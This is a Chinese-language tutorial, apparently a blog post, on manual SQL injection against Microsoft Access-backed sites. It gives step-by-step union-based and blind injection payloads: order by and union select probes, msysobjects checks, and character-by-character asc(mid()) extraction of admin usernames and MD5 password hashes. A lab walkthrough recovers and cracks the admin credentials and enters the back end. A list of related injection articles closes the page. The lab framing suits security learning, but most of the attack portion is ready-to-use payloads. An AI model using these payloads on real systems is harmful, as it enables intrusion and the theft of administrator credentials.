Access数据库手工注入
ACCESS数据库手工注入
access数据库
是一种非常简单但是功能完整的数据库,很适合小型网站创建,可以很轻松管理表和列,有很多管理工具。
access数据库结构?
access数据库是这么个结构: 表名---->列名---->内容数据 他不像其他的数据库一样、里面创建多个数据库然后才是表再是内容、而access的话只有一个库若干张表。
access注入基本流程?
判断有没有注入点
猜解表名
猜解字段
猜解管理员ID值
猜解用户名和密码长度
猜解用户名和密码
ASP的数据库:SQL sever或者access
判断有没有注入?
- 加引号法
联合查询法(速度快、兼容性不好)
- and 1=1 、 and 1=2——判断注入
- order by …(猜有多少列order by 5回显正确,order by 6报错,则表示有五列)
- union select 1,2,3,4,5 from admin(猜表名,如果报错就说明表名不存在,将admin换成别的)
- union select1,2,username,4,password(在数字3,5有回显位即在回显位上进行猜解字段)
靶场手工注入图文
简单寻找注入点
在URL后面加 and 1=1 原页面无变化
在URL后面加 and 1=2 后原页面报错无显示
由此初步判断ID参数存在SQL注入漏洞,可以通过进一步拼接SQL语句进行攻击。
在发现注入点后,通过修改order by参数值,依据回显情况判断表中包含列数:
由上图可知表中列数为22,因为但order by 23的时候回显异常。
判断出列数后,接着使用union select语句进行回显。(在不知道任何条件的时候语句如下:SELECT 要查询的字段名 FROM 库名,表名)
盲猜字段来自表admin,回显字段3和15可以显示,将3或者15的位置改为password。
然后拿password去md5解密,即可得到密码:
access数据库盲注?
判断是什么数据库?
SQL sever或者access(回显正常是SQL sever回显不正常是access)语句如1
先找数据传参的地方,寻找注入点
1、用来判断数据库
and (select count(*) from msysobjects)>0 回显错误,证明该数据库为access数据:
或者
and exists(select * from msysobjects)>0 回显成功/根据回显消息提示,没有读取数据权限,即该数据库为access
2、查表名,回显正确即表示存在表名admin
and 0<>(select count(*)from andmin)
或者
and exists(select * from admin)
3、判断管理员账号数目(>1回显正确 >2报错 即表示存在一个管理员账号)
and (select count(*) from admin)>0(数字可以修改)
4、查询admin下的adminuid(通过F12查看源代码猜测)是否存在
and 1=(select count(*)from admin where len (adminuid)>0)
判断存在后猜测字段长(=5时回显正确,即字段长=5)
and 1=(select count(*)from admin where len (adminuid)=5)
5、判断密码的字段长(当字段长=16时回显正常)
由于密码都是MD5加密,故长度为16或者32
and 1=(select count(*)from admin where len (adminpwd)>0)
以上可知管理员账号:admin 密码为16位md加密
ASCII码
6、验证账号为admin
一位一位的用大于等于号判断
and (select top 1 asc(mid(adminuid,1,1))from admin)=55
and (select top 1 asc(mid(adminuid,2,1))from admin)=97
and (select top 1 asc(mid(adminuid,3,1))from admin)>1
......
7、一步一步猜解密码16为7a57a5a743894a0e(解密为admin)
and (select top 1 asc(mid(adminpwd,1,1))from admin)>1
and (select top 1 asc(mid(adminpwd,2,1))from admin)>1
......
靶场手工盲注入图文
寻找传参的地方,有三整数型传参,均可注入:
接着判断数据库类型
and (select count(*) from msysobjects)>0
接着查表名
and 0<>(select count(*)from andmin)
查完表名判断该表中管理员账号数目,查完为1:
and (select count(*) from admin)>0(数字可以修改)
查询admin表下的adminuid是否存在以及字段长:
and 1=(select count(*)from admin where len (adminuid)>0)
判断密码的字段长,当字段长16时回显正常:
and 1=(select count(*)from admin where len (adminpwd)>0)
以上可知管理员账号:admin 密码为16位md加密
然后
去探寻16位密码,ASCII加密:
and (select top 1 asc(mid(adminpwd,1,1))from admin)>1(数字可修改)
或者
and (select asc(mid(adminpwd,1,1))from admin)>1(数字可修改)
…最后密码为:7a57a5a743894a0e(去md5解密)
综上解出账号:admin 密码:admin
进入admin后台
Access数据库手工注入相关推荐
- mysql md5解密_Web渗透测试——Mysql数据库手工注入
我们之前讲到了SQL注入漏洞是一种非常危险的高危漏洞,攻击者可以利用许多工具轻而易举的获得目标站点后台管理权限,我们也介绍了许多SQL注入利用工具,有网友问我,既然可以使用工具自动注入,为什么还要用手 ...
- Access数据库偏移注入
前言 本来想好好介绍一下Access数据库的偏移注入,找个目标来试试,但是找了好久都没有找到,又想自己要不在本地搭建一个?额...还是算了吧,没有太多的时间,之后在网上搜索了一些"偏移注入& ...
- 15、Access数据库偏移注入
前言 本来想好好介绍一下Access数据库的偏移注入,找个目标来试试,但是找了好久都没有找到,又想自己要不在本地搭建一个?额...还是算了吧,没有太多的时间,之后在网上搜索了一些"偏移注入& ...
- WEB安全之:Access 数据库 SQL 注入
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关.倡导维护网络安全人人有责,共同维护网络文明和谐. SQ ...
- 某网站安全检测之数据库手工注入
某网站安全检测之数据库手工注入 一.引子 长夜慢慢,无心睡眠-- 无意中翻到几年前听的一首名为<祖先的阴影>的摇滚,这么长久的历史,混合着许多的罪恶与功绩:这么"灿 ...
- 【CyberSecurityLearning 60】ACCESS数据库的注入+ACCESS数据库的cookie注入
目录 ACCESS注入 雷驰新闻系统v1.0环境搭建: ACCESS数据库注入演示1: 雷驰新闻系统v3.0环境搭建: cookie注入演示2: ACCESS数据库注入用sqlmap怎么做?演示: A ...
- Access数据库——Cookie注入
目录 1.Cookie注入 什么是Cookie? Cookie注入简介 Cookie和注入有什么关系? Cookie的核心 2.如何设置Cookie? 方法一:依靠浏览器进行设置 方法二:抓包直接修改 ...
- Access数据库及注入方法
Access数据库 Microsoft Office Access是由微软发布的关系数据库管理系统.Microsoft Office Access是微软把数据库引擎的图形用户界面和软件开发工具结合在一 ...
- 数据库手工注入中的闭合
1.什么是闭合? 闭合:这个语句可以完整正确的执行 后台服务器PHP代码: $sql = "SELECT * FROM users WHERE id = $id LIMIT 0,1" ...
最新文章
- mysql os.pid_离线安装Mysql
- mysql 随机update_MySQL随机查询数据与随机更新数据
- Windows 10 to Go
- (转)用JS实现表格中隔行显示不同颜色
- mongodb如何根据字段(数组类型)的长度排序_大数据存储技术选型(七)——MongoDB设计模式及索引优化...
- Windows平台Unity3d下如何同时播放多路RTSP或RTMP流
- 关于Bugzilla WebService接口
- SpringCloud工作笔记085---SpringBoot项目中防止跨站脚本攻击功能添加
- Linux下的PDF阅读器Foxit
- [paper reading] RetinaNet
- 最佳开源大数据工具-2015
- android 生成 kml代码,android 导入KML文件
- 计算机串口接打印机并口,电子连接系统上的串口和并口知识分享
- 618网购盛宴即将开启,云联络中心+AI成为电商的“新基建”
- c语言星空特效源代码,星空 - 网页特效代码|网页特效观止 - 让你的网页靓起来!...
- 香山芯片调试目标完成,直播完毕
- Python 基础变量声明
- linux玩 LOL
- CSS 成长之路(六)顶线、中线、基线、底线与行距
- 免费数据库应用程序工具 - 不需代码